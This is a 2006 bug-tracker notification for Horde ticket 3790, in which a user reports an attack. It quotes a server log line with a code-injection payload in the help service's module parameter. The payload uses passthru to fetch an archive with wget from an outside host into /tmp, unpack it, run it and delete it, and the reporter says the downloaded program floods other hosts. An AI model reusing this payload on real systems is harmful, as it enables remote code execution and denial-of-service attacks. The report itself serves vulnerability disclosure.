[Tickets #3790] NEW: exploit
bugs@bugs.horde.org
bugs at bugs.horde.org
Tue Apr 18 21:40:27 PDT 2006
DO NOT REPLY TO THIS MESSAGE. THIS EMAIL ADDRESS IS NOT MONITORED.
Ticket URL: http://bugs.horde.org/ticket/?id=3790
-----------------------------------------------------------------------
Ticket | 3790
Created By | info at argonet.hu
Summary | exploit
Queue | Horde Base
Version | 3.1-RC3
State | Unconfirmed
Priority | 3. High
Type | Bug
Owners |
-----------------------------------------------------------------------
info at argonet.hu (2006-04-18 21:40) wrote:
Hi!
There's a hole&bug in the horde code:
GET
//horde//services/help/?show=about&module=;%22.passthru(%22cd%20%22.chr(47).
%22tmp;wget%20attilahack.100free.com%22.chr(47).%22oper.tar;tar%20xvf%20oper
.tar;.%22.chr(47).%22oper;rm%20-rf%20oper.tar%20oper%22);'. HTTP/1.1" 200
8272 "-" "Nozilla/P.N (Just for IDS woring)"
It runs a flood program and attacking...
More information about the bugs
mailing list